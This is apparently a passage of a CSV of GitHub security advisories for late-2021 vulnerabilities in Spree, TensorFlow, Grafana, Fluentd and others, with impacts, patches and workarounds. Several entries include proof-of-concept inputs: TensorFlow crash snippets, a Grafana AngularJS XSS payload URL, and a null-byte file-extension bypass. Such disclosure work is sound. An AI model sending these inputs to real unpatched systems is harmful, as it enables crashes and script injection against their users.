+1.4.0,GHSA-26xx-m4q2-xhq8,2023-05-04T19:59:52Z,2021-11-18T20:14:19Z,,['CVE-2021-41275'],Authentication Bypass by CSRF Weakness,"### Impact
+
+CSRF vulnerability that allows user account takeover.
+
+All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both:
+
+* Executed whether as:
+ * A before_action callback (the default)
+ * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find).
+* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception).
+
+That means that applications that haven't been configured differently from what it's generated with Rails aren't affected.
+
+Thanks @waiting-for-dev for reporting and providing a patch 👏
+
+### Patches
+
+Spree 4.3 users should update to spree_auth_devise 4.4.1
+Spree 4.2 users should update to spree_auth_devise 4.2.1
+Spree 4.1 users should update to spree_auth_devise 4.1.1
+Older Spree version users should update to spree_auth_devise 4.0.1
+
+### Workarounds
+
+If possible, change your strategy to :exception:
+
+```ruby
+class ApplicationController < ActionController::Base
+ protect_from_forgery with: :exception
+end
+```
+
+Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller:
+
+```ruby
+config.after_initialize do
+ Spree::UsersController.protect_from_forgery with: :exception
+end
+```
+
+### References
+https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.4.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/security/advisories/GHSA-26xx-m4q2-xhq8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41275'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/commit/adf6ed4cd94d66091776b5febd4ff3767362de63'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2021-41275.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree_auth_devise'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:07:45Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}"
+1.4.0,GHSA-xx4c-jj58-r7x6,2022-07-12T00:11:53Z,2021-11-19T20:14:23Z,,[],Inefficient Regular Expression Complexity in Validator.js,"### Impact
+Versions of `validator` prior to 13.7.0 are affected by an inefficient Regular Expression complexity when using the `rtrim` and `trim` sanitizers.
+
+### Patches
+The problem has been patched in validator 13.7.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'validator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.1.0'}, {'fixed': '13.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/validatorjs/validator.js/security/advisories/GHSA-xx4c-jj58-r7x6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3765'}, {'type': 'WEB', 'url': 'https://github.com/validatorjs/validator.js/issues/1599'}, {'type': 'WEB', 'url': 'https://github.com/validatorjs/validator.js/pull/1738'}, {'type': 'PACKAGE', 'url': 'https://github.com/validatorjs/validator.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c37e975c-21a3-4c5f-9b57-04d63b28cfc9/'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:27:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h352-g5vw-3926,2023-06-13T17:27:02Z,2021-11-16T17:26:47Z,,['CVE-2021-43620'],Improper Input Validation in fruity,"Methods of NSString for conversion to a string may return a partial result. Since they call CStr::from_ptr on a pointer to the string buffer, the string is terminated at the first null byte, which might not be the end of the string.
+
+In addition to the vulnerable functions listed for this issue, the implementations of Display, PartialEq, PartialOrd, and ToString for NSString are also affected, since they call those functions.
+
+Since NSString is commonly used as the type for paths by the Foundation framework, null byte truncation might allow for easily bypassing file extension checks. For example, if a file name is provided by a user and validated to have one of a specific set of extensions, with validation taking place before truncation, an attacker can add an accepted extension after a null byte (e.g., file.exe\0.txt). After truncation, the file name used by the application would be file.exe.
+
+It would be better to generate unique names for files, instead of using user-provided names, but not all applications take this approach.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'fruity'}, 'ecosystem_specific': {'affected_functions': ['fruity::foundation::NSString::to_str', 'fruity::foundation::NSString::to_str_with_nul', 'fruity::foundation::NSString::to_string', 'fruity::foundation::NSString::to_string_with_nul']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43620'}, {'type': 'WEB', 'url': 'https://github.com/nvzqz/fruity/issues/14'}, {'type': 'WEB', 'url': 'https://github.com/rustsec/advisory-db/pull/1102'}, {'type': 'PACKAGE', 'url': 'https://github.com/nvzqz/fruity'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0123.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-16T15:32:42Z', 'nvd_published_at': '2021-11-15T05:15:00Z'}"
+1.4.0,GHSA-g9wh-3vrx-r7hg,2021-11-10T18:19:37Z,2021-11-10T20:39:23Z,,['CVE-2021-3912'],OctoRPKI crashes when processing GZIP bomb returned via malicious repository,"OctoRPKI tries to load the entire contents of a repository in memory, and in the case of a GZIP bomb, unzip it in memory, making it possible to create a repository that makes OctoRPKI run out of memory (and thus crash).
+
+## Patches
+
+## For more information
+If you have any questions or comments about this advisory email us at security@cloudflare.com
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-g9wh-3vrx-r7hg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3912'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/commit/648658b1b176a747b52645989cfddc73a81eacad'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0253'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}, {'type': 'PACKAGE', 'url': 'github.com/cloudflare/cfrpki'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:19:37Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}"
+1.4.0,GHSA-hwhf-64mh-r662,2021-11-04T17:05:51Z,2021-11-01T19:16:31Z,,['CVE-2021-41186'],ReDoS vulnerability in parser_apache2,"### Impact
+parser_apache2 plugin in Fluentd v0.14.14 to v1.14.1 suffers from a regular expression denial of service (ReDoS) vulnerability. A broken apache log with a certain pattern of string can spend too much time in a regular expression, resulting in the potential for a DoS attack.
+
+### Patches
+v1.14.2
+
+### Workarounds
+Either of the following:
+
+* Don't use parser_apache2 for parsing logs which cannot guarantee generated by Apache.
+* Put patched version of parser_apache2.rb into /etc/fluent/plugin directory (or any other directories specified by the environment variable `FLUENT_PLUGIN` or `--plugin` option of fluentd).
+
+### References
+* [CVE-2021-41186](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41186)
+* [GHSA-hwhf-64mh-r662](https://github.com/fluent/fluentd/security/advisories/GHSA-hwhf-64mh-r662)
+* [GHSL-2021-102](https://securitylab.github.com/advisories/GHSL-2021-102-fluent-fluentd/)
+* https://github.com/fluent/fluentd/blob/master/CHANGELOG.md#v1142
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'fluentd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.14'}, {'fixed': '1.14.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fluent/fluentd/security/advisories/GHSA-hwhf-64mh-r662'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41186'}, {'type': 'WEB', 'url': 'https://github.com/fluent/fluentd/commit/5482a3d049dab351de0be68f4b4bc562319d8511'}, {'type': 'PACKAGE', 'url': 'https://github.com/fluent/fluentd'}, {'type': 'WEB', 'url': 'https://github.com/fluent/fluentd/blob/master/CHANGELOG.md#v1142'}, {'type': 'WEB', 'url': 'https://github.com/github/securitylab-vulnerabilities/blob/52dc4a2a828c6dc24231967c2937ad92038184a9/vendor_reports/GHSL-2021-102-fluent-fluentd.md'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/fluentd/CVE-2021-41186.yml'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-29T13:44:13Z', 'nvd_published_at': '2021-10-29T14:15:00Z'}"
+1.4.0,GHSA-fr77-rrx3-cp7g,2021-11-08T22:31:43Z,2021-11-10T19:00:31Z,,['CVE-2021-41212'],Heap OOB read in `tf.ragged.cross`,"### Impact
+The [shape inference code for `tf.ragged.cross`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/ragged_array_ops.cc#L64) can trigger a read outside of bounds of heap allocated array:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def test():
+ y = tf.raw_ops.RaggedCross(ragged_values=[],
+ ragged_row_splits=[],
+ sparse_indices=[[5]],
+ sparse_values=[],
+ sparse_shape=[5],
+ dense_inputs=[['a']],
+ input_order='RD',
+ hashed_output=False,
+ num_buckets=5,
+ hash_key=2,
+ out_values_type=tf.string,
+ out_row_splits_type=tf.int64)
+ return y
+
+test()
+```
+
+### Patches
+We have patched the issue in GitHub commit [fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8](https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fr77-rrx3-cp7g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41212'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:31:43Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-2cqg-q7jm-j35c,2021-11-17T21:13:25Z,2021-11-15T23:19:42Z,,['CVE-2021-3938'],snipe-it is vulnerable to Cross-site Scripting,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3938'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/9ed1442bd124710f4178992cc4eca5236c7396b9'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/198a0d67-9189-4170-809b-0f8aea43b063'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:10:46Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}"
+1.4.0,GHSA-wwgq-9jhf-qgw6,2021-11-17T21:08:25Z,2021-11-18T15:46:57Z,,['CVE-2021-41273'],Cross-Site Request Forgery allowing sending of test emails and generation of node auto-deployment keys,"### Impact
+Due to improperly configured CSRF protections on two routes, a malicious user could execute a CSRF-based attack against the following endpoints:
+
+* Sending a test email.
+* Generating a node auto-deployment token.
+
+At no point would any data be exposed to the malicious user, this would simply trigger email spam to an administrative user, or generate a single auto-deployment token unexpectedly. This token is not revealed to the malicious user, it is simply created unexpectedly in the system.
+
+### Patches
+This has been addressed in https://github.com/pterodactyl/panel/commit/bf9cbe2c6d5266c6914223e067c56175de7fc3a5 which will be released as `1.6.6`.
+
+### Workarounds
+Users may optionally manually apply the fixes released in v1.6.6 to patch their own systems.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pterodactyl/panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/security/advisories/GHSA-wwgq-9jhf-qgw6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41273'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/commit/bf9cbe2c6d5266c6914223e067c56175de7fc3a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/panel'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T14:37:10Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}"
+1.4.0,GHSA-3j9m-hcv9-rpj8,2021-11-29T15:05:31Z,2021-11-08T18:13:19Z,,['CVE-2021-41174'],XSS vulnerability allowing arbitrary JavaScript execution,"Today we are releasing Grafana 8.2.3. This patch release includes an important security fix for an issue that affects all Grafana versions from 8.0.0-beta1.
+
+[Grafana Cloud](https://grafana.com/cloud) instances have already been patched and an audit did not find any usage of this attack vector. [Grafana Enterprise](https://grafana.com/products/enterprise) customers were provided with updated binaries under embargo.
+
+## CVE-2021-41174 XSS vulnerability on unauthenticated pages
+
+### Summary
+
+CVSS Score: 6.9 Medium
+CVSS:[CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N/E:U/RL:O/RC:R/CR:L/MAV:N/MAC:H/MPR:N/MUI:R/MS:C/MC:N/MI:H/MA:L](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N/E:U/RL:O/RC:R/CR:L/MAV:N/MAC:H/MPR:N/MUI:R/MS:C/MC:N/MI:H/MA:L)
+
+We received a security report to security@grafana.com on 2021-10-21 about a vulnerability in Grafana regarding the XSS vulnerability.
+
+It was later identified as affecting Grafana versions from 8.0.0-beta1 to 8.2.2. [CVE-2021-41174](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41174) has been assigned to this vulnerability.
+
+### Impact
+
+If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser.
+
+The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar.
+
+There are two ways an unauthenticated user can open a page in Grafana that contains the login button:
+- Anonymous authentication is enabled. This means all pages in Grafana would be open for the attack.
+- The link is to an unauthenticated page. The following pages are vulnerable:
+ - `/dashboard-solo/snapshot/*`
+ - `/dashboard/snapshot/*`
+ - `/invite/:code`
+
+The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. AngularJS uses double curly braces for interpolation binding: {{ }}
+
+An example of an expression would be: `{{constructor.constructor(‘alert(1)’)()}}`. This can be included in the link URL like this:
+
+https://play.grafana.org/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
+
+When the user follows the link and the page renders, the login button will contain the original link with a query parameter to force a redirect to the login page. The URL is not validated and the AngularJS rendering engine will execute the JavaScript expression contained in the URL.
+
+### Attack audit
+
+We can not guarantee that the below will identify all attacks, so if you find something using the audit process described below, you should consider doing a full assessment.
+
+#### Through reverse proxy/load balancer logs
+
+To determine if your Grafana installation has been exploited for this vulnerability, search through your reverse proxy/load balancer access logs for instances where the path contains `{{` followed by something that would invoke JavaScript code. For example, this could be code that attempts to show a fake login page or to steal browser or session data. The [OWASP cheat sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) has several examples of XSS attacks.
+
+#### Through the Grafana Enterprise audit feature
+
+If you enabled “Log web requests” in your configuration with `router_logging = true`, look for requests where `path` contains `{{` followed by something that would invoke JavaScript code.
+
+### Patched versions
+
+Release 8.2.3:
+
+- [Download Grafana 8.2.3](https://grafana.com/grafana/download/8.2.3)
+- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-2-3/)
+
+### Solutions and mitigations
+
+Download and install the appropriate patch for your version of Grafana.
+
+[Grafana Cloud](https://grafana.com/cloud) instances have already been patched, and [Grafana Enterprise](https://grafana.com/products/enterprise) customers were provided with updated binaries under embargo.
+
+### Workaround
+
+If for some reason you cannot upgrade, you can use a reverse proxy or similar to block access to block the literal string `{{` in the path.
+
+Example of an Nginx rule to block the literal string `{{`:
+
+```
+location ~ \{\{ {
+ deny all;
+}
+```
+### Timeline and postmortem
+
+Here is a detailed timeline starting from when we originally learned of the issue. All times in UTC.
+
+* 2021-10-21 23:13: Security researcher sends the initial report about an XSS vulnerability.
+* 2021-10-21 23:13: Confirmed to be reproducible in at least versions 8.0.5 and 8.2.2.
+* 2021-10-22 02:02 MEDIUM severity declared.
+* 2021-10-22 09:22: it is discovered that Grafana instances with anonymous auth turned on are vulnerable. This includes https://play.grafana.org/ .
+* 2021-10-22 09:50: Anonymous access disabled for all instances on Grafana Cloud as a mitigation measure.
+* 2021-10-22 11:15: Workaround deployed on Grafana Cloud that blocks malicious requests.
+* 2021-10-22 12:35: Enabled anonymous access for instances on Grafana Cloud.
+* 2021-10-22 12:51: All instances protected by the workaround. From this point forward, Grafana Cloud is no longer affected.
+* 2021-10-22 14:05 Grafana Cloud instances updated with a fix.
+* 2021-10-22 19:23 :Determination that no weekend work is needed as the issue is of MEDIUM severity and the root cause has been identified.
+* 2021-10-25 14:13: Audit of Grafana Cloud concluded, no evidence of exploitation.
+* 2021-10-27 12:00: Grafana Enterprise images released to customers under embargo.
+* 2021-11-03 12:00: Public release.
+
+## Reporting security issues
+
+If you think you have found a security vulnerability, please send a report to [security@grafana.com](mailto:security@grafana.com). This address can be used for all of
+Grafana Labs' open source and commercial products (including but not limited to Grafana, Tempo, Loki, k6, Tanka, and Grafana Cloud, Grafana Enterprise, and grafana.com). We only accept vulnerability reports at this address. We would prefer that you encrypt your message to us using our PGP key. The key fingerprint is:
+
+F988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA
+
+The key is available from [ keyserver.ubuntu.com]( https://keyserver.ubuntu.com/pks/lookup?op=get&fingerprint=on&search=0xD1258932BE24C5CA) by searching for [security@grafana]( https://keyserver.ubuntu.com/pks/lookup?search=security@grafana&fingerprint=on&op=index).
+
+## Security announcements
+
+There is a Security [category](https://grafana.com/tags/security/) on the Grafana blog where we will post a summary, remediation, and mitigation details for any patch containing security fixes and you can subscribe to updates from our [Security Announcements RSS feed](https://grafana.com/tags/security/index.xml).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@grafana/data'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41174'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/fb85ed691290d211a5baa44d9a641ab137f0de88'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211125-0003/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T18:18:08Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}"
+1.4.0,GHSA-vpfp-5gwq-g533,2023-09-05T22:18:19Z,2021-11-17T23:15:30Z,,['CVE-2021-37580'],Improper Authentication in Apache ShenYu Admin,A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shenyu:shenyu-admin'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37580'}, {'type': 'WEB', 'url': 'https://github.com/apache/shenyu/commit/f78adb26926ba53b4ec5c21f2cf7e931461d601d'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shenyu'}, {'type': 'WEB', 'url': 'https://github.com/apache/shenyu/releases/tag/v2.4.1'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/16/1'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T22:31:03Z', 'nvd_published_at': '2021-11-16T10:15:00Z'}"
+1.4.0,GHSA-cvgx-3v3q-m36c,2021-11-08T22:32:45Z,2021-11-10T19:01:03Z,,['CVE-2021-41211'],Heap OOB in shape inference for `QuantizeV2`,"### Impact
+The [shape inference code for `QuantizeV2`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/framework/common_shape_fns.cc#L2509-L2530) can trigger a read outside of bounds of heap allocated array:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def test():
+ data=tf.raw_ops.QuantizeV2(
+ input=[1.0,1.0],
+ min_range=[1.0,10.0],
+ max_range=[1.0,10.0],
+ T=tf.qint32,
+ mode='MIN_COMBINED',
+ round_mode='HALF_TO_EVEN',
+ narrow_range=False,
+ axis=-100,
+ ensure_minimum_range=10)
+ return data
+
+test()
+```
+
+This occurs whenever `axis` is a negative value less than `-1`. In this case, we are accessing data before the start of a heap buffer:
+
+```cc
+int axis = -1;
+Status s = c->GetAttr(""axis"", &axis);
+if (!s.ok() && s.code() != error::NOT_FOUND) {
+ return s;
+}
+...
+if (axis != -1) {
+ ...
+ TF_RETURN_IF_ERROR(
+ c->Merge(c->Dim(minmax, 0), c->Dim(input, axis), &depth));
+}
+```
+
+The code allows `axis` to be an optional argument (`s` would contain an `error::NOT_FOUND` error code). Otherwise, it assumes that `axis` is a valid index into the dimensions of the `input` tensor. If `axis` is less than `-1` then this results in a heap OOB read.
+
+### Patches
+We have patched the issue in GitHub commit [a0d64445116c43cf46a5666bd4eee28e7a82f244](https://github.com/tensorflow/tensorflow/commit/a0d64445116c43cf46a5666bd4eee28e7a82f244).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, as this version is the only one that is also affected.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cvgx-3v3q-m36c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41211'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a0d64445116c43cf46a5666bd4eee28e7a82f244'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:32:45Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-786j-5qwq-r36x,2021-11-08T22:45:03Z,2021-11-10T19:12:14Z,,['CVE-2021-41204'],Segfault while copying constant resource tensor,"### Impact
